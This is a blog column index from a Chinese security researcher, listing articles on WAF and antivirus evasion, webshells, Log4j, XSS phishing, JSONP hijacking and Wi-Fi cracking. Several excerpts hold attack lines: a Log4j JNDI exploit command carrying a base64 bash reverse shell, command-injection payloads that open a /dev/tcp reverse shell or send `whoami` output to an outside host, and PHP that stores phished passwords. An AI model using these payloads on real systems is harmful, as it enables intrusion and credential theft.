![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
安全
文章平均质量分 72
goddemon
EduSRC 2021年榜第七
土司论坛2022名人堂
src挖掘收入6位数以上
自信从容,虚心进步,慢慢成长
展开
-
实战之巧用header头
基于开发的角度去探究漏洞,或许思路会更巧更妙。原创 2023-10-30 21:36:41 · 384 阅读 · 0 评论 -
知识管理一体化
自信从容,虚心进步,慢慢成长。大胆追逐自己想要的一切,大胆的爱自己所爱之人,剩下留给天意,别那么在乎获得。退万步讲,如果真的不ok,转身走就ok,对得起自己最重要。原创 2023-06-24 15:12:20 · 444 阅读 · 1 评论 -
快速挖掘技巧+某学校实战案例分享
前段时间,跟一个朋友聊天中,被提到想看写一些实战的文章,学习挖掘的思路,而不是写一些bypass思路的tips。不过因为学东西+毕业设计,也一直没空写相关的文章,最近刚把毕设整的差不多了,还差2个漏洞没修,也暂时不想写论文。想歇会,就给大家水一篇之前挖洞的实战文章,大佬们就勿喷了,重点思路吧。案例的话,因为很久没碰过edu了,所以就拿去年整的某体育学院的为例咯。原创 2023-03-11 18:26:40 · 596 阅读 · 0 评论 -
三个bypass案例分享
首发:土司论坛。原创 2023-01-03 10:09:37 · 724 阅读 · 4 评论 -
TP 5.0.24反序列化漏洞分析
很久没发过文章了,最近在研究审计链条相关的东西,codeql,ast,以及一些java的东西很多东西还是没学明白就先不写出来丢人了,写这篇tp的原因呢虽然这个漏洞的分析文章蛮多了,但是还是跟着看了下,一方面是因为以前对pop链挖掘一直学的懵懵懂懂的 ctf的一些pop链能出,但是到了框架里面自己就是挖不出来,所以就想着自己挖下tp反序列化的链子来看看,另一方面是想思考学习下php挖掘利用ast手法去该怎么入手(虽然后面这个问题还没解决),所以就有了这篇文章。原创 2022-10-20 16:02:54 · 5901 阅读 · 1 评论 -
内容bypass分享
典型常见的拦截情况①直接reset②能上传成功但拦截url页面即访问时线上没有该页面个人理解的waf内容检测原理:waf检测的原理:动态检测–>检测进程和request和response包居多静态检测–>强检(检测到某些参数或者内容就直接reset掉)或者是弱检(即一部分敏感然后在给人检测)这里要绕的一般就是静态检测直接连shell的使用哥斯拉或者冰蝎冰蝎启动不了 解决方法https://blog.csdn.net/RABCDXB/article/details/122250489?sp原创 2022-07-25 11:51:38 · 8262 阅读 · 0 评论 -
PHP利用某些函数bypass waf探讨
前几天写了一篇文章,由黑到白这篇文章中用到echo的一个特性去一步一步写马看师傅们的评论然后去研究了下原因学到了很多比如linux写shell少了_POST空格以及$这些字符都写不进去也恰好看到了微信公众号里面有个师傅写了篇文章链接如下https里面提到了一个tips利用get_headers绕过了waf顿时引来了自己的兴趣,因为目前的很多waf是基于post包和get包来拦截的如果我把参数内容可控到header头里面不就能稳稳的过了嘛。............原创 2022-07-22 19:43:03 · 365 阅读 · 0 评论 -
过D盾php webshell免杀马探讨
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任最近有在系统的总计waf绕过内容和后缀的绕过,把以前别的师傅发过的很多东西做了一些总结在这个过程中发觉了其实webshell的bypass手法还是蛮多的后缀bypass总结完了经过实战也绕过了很多家最新的waf后缀内容的还没写完东西有点多这里就分享一些php免杀的马全过的也有贼多但是暂时就不分享了。......原创 2022-07-19 18:00:52 · 1641 阅读 · 1 评论 -
过d盾 jsp webshell+冰蝎免杀马探讨
jsp免杀马的思路其实一般最常用的就是反射和类加载问题+反转问题就能bypasswebshell的查杀了当然现在的有些厂商直接强标识这种就要el去绕咯。原创 2022-07-19 17:59:24 · 2369 阅读 · 1 评论 -
过d盾asp webshell+冰蝎免杀马探讨
正文asp免杀的手法其实也蛮多的个人理解其实免杀核心就是混淆+改变执行顺序啥的。对于asp而言,前者的利用特征这些进行绕后者就是利用函数数组+类的手法个人后者的手法用的最多一样吧这里先扔2个bypass的小马。...原创 2022-07-19 17:57:10 · 2196 阅读 · 0 评论 -
一些工具改造
①user-agent流量特征②shellcode未加密流量特征后面补的所有上面的useragent已经被改了。原创 2022-07-19 17:24:25 · 1002 阅读 · 0 评论 -
某设备由黑到白(附前台0day)
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任注本次测试为授权测试本文没啥特别实际的技术,只是给大家分享一些思路和自己的一些的一些思考,具体的系统师傅们自己定位。...原创 2022-07-19 17:19:32 · 1163 阅读 · 0 评论 -
免杀exe技术探讨
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任最近把大部分的语言的捣鼓分析了下c的python的rust的go的常见的语言市面上有的都研究了下也写了一下自己的发觉python的确实可以说是最简单的了,不过其实深入免杀的话还是得进程注入走ring0层去对抗杀软,不然单纯的静态过了终究有些行为还是会呗动态杀这篇分享一篇python的吧效果看正文全过的也有不过现在肯定是不会发的。...原创 2022-07-19 17:09:46 · 1145 阅读 · 0 评论 -
DLL免杀技术探讨
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任本来不打算写免杀相关的了但是确实是忍不住想吐槽,啧啧啧,因为有一直在研究进程注入以及ring3层的bypass免杀的一些东西因为就得去给相关的文件做免杀杀的然后给某步提交了一些样本提交完不管是否公开感觉就是转手就给厂商卖钱这里公开一个样本给大家看看时间样本均是登录账户提交的均未公开14的时候是vt全过。...原创 2022-07-19 17:05:17 · 1437 阅读 · 0 评论 -
bypass 某狗sql和xss
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。原创 2022-07-19 16:57:40 · 265 阅读 · 0 评论 -
一次批量挖掘时获取到的接口用以分析jsonp以及xss漏洞挖掘分析
前言:因为一直在捣鼓批量挖掘在测批量挖掘的一个思路时,跑了某个小游戏的域名跑出来这个接口觉得这个接口拿来当例子复现是个很不错的选择正文获取到如下的接口http://网站/api/position/615?callback=111发觉是一个很不错的例子这里就直接用这个来简单的教大家怎么挖掘jsonp的漏洞和xss进阶钓鱼使用xss基础的使用就不说了最基础的当然也是因为这里没waf 如果有waf的话就想办法绕就好了waf还是蛮好绕的这里肯定是核心写进阶利用的jsonp核心利用的原创 2022-05-02 23:55:38 · 552 阅读 · 3 评论 -
记录一下利用手机捣鼓的一些东西吧
手机排版将就看吧,具体操作自己研究这里只提供思路方向前言:因为一些事情,所以回家了,电脑也没带,暂时回不去学校,新买的电脑也还没到就只能用手机捣鼓和总结一些东西了,这里写一些出来,给大家提供一些思路一.游戏漏洞挖掘(基于内存的思路去搞)这里以小程序的为例利用gg修改器进行破解(因为这里做的是技术探讨,所以这里就选择一个不需要充值之类的游戏进行复现)游戏~~>房东模拟器这个游戏貌似还蛮火的,还有app端估计是一样的可搞进入正题现在刷好的挖掘思路1.1打开gg修改器进去选择游原创 2022-04-23 09:04:44 · 4714 阅读 · 0 评论 -
敏感信息泄露总结
一.源代码泄露二.服务器导致的泄露Apache类泄露样例文件泄露/examples/servlets/servlet/CookieExample/examples/servlets/servlet/RequestHeadersExample/examples/jsp/snp/snoop.jsp/examples/async/async1cookie泄露IIS泄露典型iis短文件名https://github.com/lijiejie/IIS_shortname_ScannerTo原创 2022-03-15 21:56:24 · 13027 阅读 · 5 评论 -
JAVA安全--log4j漏洞研究分析
log4j漏洞复现复现这里以bugku上的靶场为例进行复现https://ctf.bugku.com/challenges/detail/id/340.html环境配置①ldap服务服务器起一个ldap服务就好了直接执行反弹shell即直接配置bash反弹shell命令java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTYuM原创 2022-03-12 23:49:55 · 9741 阅读 · 0 评论 -
XSS进阶
前置知识点:①javascript基础知识javascript参考文档自我理解的javascript基础的javascript语法html dom理解属性从基础的语法也可以思考到我们能够利用js进行做的一些事情了只要具有内容 我们就可以调用js接口去获取很多东西甚至于如果浏览器的沙箱出问题了 或者是electron的东西 调用本地资源造成rce漏洞如 蜜罐去获取history 给我的理解就是访问一个网站后网站里面的js调用的web api去获取历史内容发送到指定的网站上去进而进原创 2022-03-10 23:35:14 · 1831 阅读 · 0 评论 -
jsonp劫持攻击
前言:对这个漏洞一直是知道是什么东西,但是一直不太懂这个漏洞该咋挖和咋进阶利用 今天上课的时候查漏补缺研究了下这个东西做了一个总结漏洞原理:核心利用的原理:JSONP技术可以实现数据的跨域访问,进而攻击者利用该漏洞可以向用户发送一个伪造的链接,进而当用户点击后进行回调函数进而即窃取到用户的信息典型可以跨域的标签< script src = "..." > </script><img src="..."><video src="..."><原创 2022-03-10 20:22:20 · 383 阅读 · 0 评论 -
利用手机作为渗透工具的一些思路
前言这里的配置指的是kali linux的安装wifi攻击破解的思路常用两种第一种wifite自动化WEP/WPA破解工具提示没有网卡就很难受第二种aircrack-ng破解监听网卡的账户密码dsniff -i wlan0原创 2022-03-02 23:41:15 · 8329 阅读 · 10 评论 -
应急响应学习
windows检测①检测账号1.windows中直接分析开 cmd 窗口,输入 lusrmgr.msc 命令进行查看有无可疑的账号2.日志方法进行分析“eventvwr.msc #事件查看器,且导出出Windows日志--安全#利用Log Parser进行分析典型命令1、查询登录成功的事件登录成功的所有事件LogParser.exe -i:EVT –o:DATAGRID "SELECT * FROM c:Security.evtx where EventID=4624"指定原创 2022-02-05 09:34:43 · 894 阅读 · 0 评论 -
src挖掘小技巧
一:绕过微信的检测user-agent代微信的user-agentUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 QBCore/4.0.1316.400 QQBrowser/9.0.2524.400 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36原创 2022-02-04 20:37:09 · 2870 阅读 · 0 评论 -
赏金猎人技巧
①可能隐藏的注册页面/register Laravel/user/register Drupal/wp-login.php?action=register WordPress/register eZ Publish②google常见的可能挖掘的页面inurl:example.com intitle:"index of"inurl:example.com intitle:"index原创 2022-02-04 20:28:22 · 445 阅读 · 0 评论 -
pocsuite学习
前言:轮了一圈找批量扫描的框架级别的系统 后面发觉还是回到了pocsuite上优点:①速度够快②方便对接其他的产品如fofa goby③有人维护安装教程windows的一条代码就好了pip3 install pocsuite3# 控制源的pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple pocsuite3pocsuite安装使用教程poc编写的位置pocsuite的pocs目录下poc使用方法验证方法①指定p原创 2022-01-17 22:19:14 · 725 阅读 · 0 评论 -
黑盒挖掘rce思路
黑盒常见的几个点1.文件上传 filename处这些2.邮箱3.存在域名的地方典型使用的payloadpath拼接1.常规拼接思路| ping `whoami`.z889xcgz67006o0itleim0vxcoie63.burpcollaborator.net | 2.直接反弹shell方法,编码的反弹shell思路| bash -i >& /dev/tcp/123.*.*.182/8080 0>&1 |tes.txt || echo YmFzaCAtaS原创 2021-11-11 21:17:01 · 699 阅读 · 0 评论 -
Django学习
Djanago项目搭建以及简单社工库搭建思路mysql搭建服务器的几个坑坑①注意mysql版本的问题如果版本有问题会出现mysql服务这种情况本地计算机上的mysql服务器启动后停止坑②对于安装mysql文件一点要在mysql安装目录下的bin进行安装坑③对于data目录下的是保存日志登录这些的坑④路径必须带上双引号django项目部署方案mysql服务器安装包下载问题1的情况错误评论区典型的几种情况...原创 2021-10-18 17:03:49 · 250 阅读 · 0 评论 -
java环境安装与基础知识
①环境配置jdk,jre配置查看的命令java -versionjava -jar 路径#执行运行的文件配置环境中的bin文件下的java.exe执行文件即可②写代码与代码编译记事本编辑后直接cmd dos环境运行Eclipse编译eclipse使用教程执行方法#①建立包#②建立类#③执行里面的内容#如代码package yuan.cs;public class index { public static void main(String[] args)//即使用在原创 2021-09-14 15:56:25 · 120 阅读 · 0 评论 -
java代码审计--jsp基础学习
jsp语法动作内容一.jsp生命周期二.jsp语法1.<% %>#语句类写的地方,常规写的地方2.<%! %>#变量定义的地方 如<%! int i = 0; %> 3.<%= %>#表达式#如获取当前的日期<%= (new java.util.Date()).toLocaleString()%> 4.注释<!-- --><%-- --%>三.jsp指令与动作元素3.1 三大典型指令jsp语法原创 2021-09-14 11:00:27 · 470 阅读 · 0 评论 -
XSS钓鱼和组合拳技巧
一.xss钓鱼①保存账户密码的后端钓鱼网页保存js&css到服务器,登录action改为接受密码的文件action="./pass.php"<?php //php $user=$\_POST\['username'\]; $pass=$\_POST\['password'\]; $file=fopen('pass.txt','a+'); fwrite($file,$user."|"."pass" . "\\n"); fclose($file); echo "<原创 2021-09-11 20:53:23 · 544 阅读 · 0 评论 -
.net框架
aspx①web.config文件一个目录结构<configuration>节根元素.其子下的节如下1.configSections(定义自定义配置节点信息,一般在第一行)<!--即这个含义就是定义节点名为custom,数据类型为S.....Section-->后面控制名字如error返回是什么的就用这个控制<configSections><section name="custom" type="SampleWebConfigSection.Con原创 2021-07-15 15:40:57 · 110 阅读 · 0 评论 -
PHP代码审计 文件包含专题
基础分析任意文件包含原理源码:即对包含文件没有进行过滤导致<? php $f = $_GET['f']; include_once('sys/config.php'); include($f);?>或者<?phpinclude($_GET['f']);?>利用条件:在php.ini文件中配置两个参数相关的协议allow_url_fopen :on 默认开启 该选项为on便是激活了 URL 形式的 fopen 封装协议使得可以访问 URL 对象文件等。al原创 2021-02-04 15:54:30 · 407 阅读 · 0 评论 -
PHP代码审计 SQL注入专题
常见防御方法1.开启gpc2.mysql_real_escape_string3.addslashes4.关键字过滤代码分析== 防御成功的利用这两个函数即可== <?php if (isset($_GET['Submit'])) { // Retrieve data $id = $_GET['id']; $id = stripslashes($id); $id = mysql_real_escape_string(原创 2021-02-04 15:40:59 · 363 阅读 · 0 评论 -
PHP代码审计 XSS专题
一,XSS反射型漏洞①xss漏洞处1.变量的直接输出 <?php echo $_GET['xss']; ?>如cs.php存在的是上面的这个源码http://127.0.0.1/cs.php?xss=2.$_SERVER 变量参数$_SERVER[‘PHP_SELF’] //直接在URL中输出执行XSS$_SERVER[‘HTTP_USER_AGENT’] //HTTP头中构造XSS$_SERVER[‘HTTP_REFERER’] //Referer头中构造XSS$_原创 2021-02-04 15:33:56 · 297 阅读 · 0 评论 -
路径,端口,工具总结专题
常见端口总结一,远程管理端口22 端口(SSH)#安全攻击:弱口令、暴力猜解、用户名枚举利用方式:1、通过用户名枚举可以判断某个用户名是否存在于目标主机中,2、利用弱口令/暴力破解,获取目标主机权限。23 端口(Telnet)#安全漏洞:弱口令、明文传输利用方式:1、通过弱口令或暴力破解,获取目标主机权限。2、嗅探抓取telnet明文账户密码。3389 端口(RDP)#安全漏洞:暴力破解利用方式:通过弱口令或暴力破解,获取目标主机权限。5632 端口(Pcanywhere)#安全漏洞:弱口原创 2021-01-20 19:46:14 · 3309 阅读 · 0 评论 -
绕过专题
①绕过验证码专题原理:直接截取返回包的cookie或者json流中的验证码进行绕过,提取出验证码进行直接验证即可–>绕过方法利用burp中的Extractor或者是Bp自带的Marco进行自动化测试典型类型:①如返回包的cookie中可截取验证码②返回包的json流中可能有验证码...原创 2021-01-20 19:13:32 · 560 阅读 · 0 评论 -
upload绕
绕waf的常规方法文件内容检测绕常见的内容检测几种类型①简单文件头检测gif的文件头为GIF89a或GIF87a②完整文件结构检测类型:在后端对图片的完整图片结构进行了检测绕过方法(利用图片马方式进行绕)copy /b main.gif+phpinfo.php hack.gif.php③检测提交内容中是否包含Webshell等数据常见的内容检测类型: eval( base64_encode( assert( java.lang.Runtime java.la原创 2021-01-20 18:50:25 · 340 阅读 · 0 评论 -
Getshell思路总结
getshell的常见方法总结后台getshell1.)上传getshell①基础的文件上传类方式进行getshellupload专题中间建类总结②数据库备份getshell#直接数据库备份getshell①上传图片马并获得图片马路径②通过数据库备份修改后缀名(修改为允许的后缀名代getshell)#绕方法getshell#如果名字不可以修改①将一句话木马插入到数据库中-->比如通过新建管理员用户,将用户名用一句话木马代替(用户名通常有长度限制,在前端修改maxlength即可原创 2021-01-20 18:41:46 · 3473 阅读 · 0 评论 -
无线专题
WIFI的三种加密方式wep规则wpa(具有密钥类)wpa2三种验证方式①无验证②单密码验证-->常见验证密码类破解思路:aircrack-ng抓WiFi握手包,然后通过遍历字典的方式,爆破wifi连接密码。③连接账号密码验证破解思路-->劫持思路①使用hostapd-wpe工具伪造一个同名的WiFi,然后劫持正常用户跟真WiFi之间的流量。②配置账户sudo vim /etc/hostapd-wpe/hostapd-wpe.conf③怼抓取到的ntlm密码利用a原创 2021-01-20 17:55:15 · 216 阅读 · 0 评论